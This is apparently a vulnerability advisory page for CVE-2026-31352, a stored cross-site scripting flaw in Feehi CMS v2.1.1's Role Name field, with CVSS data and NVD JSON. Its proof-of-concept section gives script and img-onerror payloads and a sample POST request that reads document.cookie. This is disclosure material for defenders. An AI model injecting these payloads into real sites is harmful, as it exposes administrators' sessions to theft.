Security Vulnerability Report
中文
CVE-2026-31352 CVSS 5.4 MEDIUM

CVE-2026-31352

Published: 2026-04-06 16:16:33
Last Modified: 2026-04-09 21:16:09

Description

An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:feehi:feehi_cms:2.1.1:*:*:*:*:*:*:* - VULNERABLE
Feehi CMS v2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-31352 // 1. Login to Feehi CMS admin panel. // 2. Navigate to Role Management -> Create Role. // 3. Inject the following payload into the 'Role Name' field: // Payload: <script>alert('CVE-2026-31352');</script> // Or using img tag to bypass basic filters: // <img src=x onerror=alert('XSS')> // 4. Submit the form. // 5. When an admin visits the Role List page, the alert will trigger. // HTTP Request Simulation: /* POST /admin/role/save HTTP/1.1 Host: target.com Cookie: SESSIONID=... Content-Type: application/x-www-form-urlencoded role_name=<img src=x onerror=alert(document.cookie)>&description=Test */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31352", "sourceIdentifier": "[email protected]", "published": "2026-04-06T16:16:33.027", "lastModified": "2026-04-09T21:16:09.390", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:feehi:feehi_cms:2.1.1:*:*:*:*:*:*:*", "matchCriteriaId": "C27559F1-734D-4924-AD35-EDC2DD9EDF7C"}]}]}], "references": [{"url": "https://github.com/liufee/cms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/liufee/cms/issues/83", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}, {"url": "https://github.com/liufee/cms/issues/83", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Mitigation"]}]}}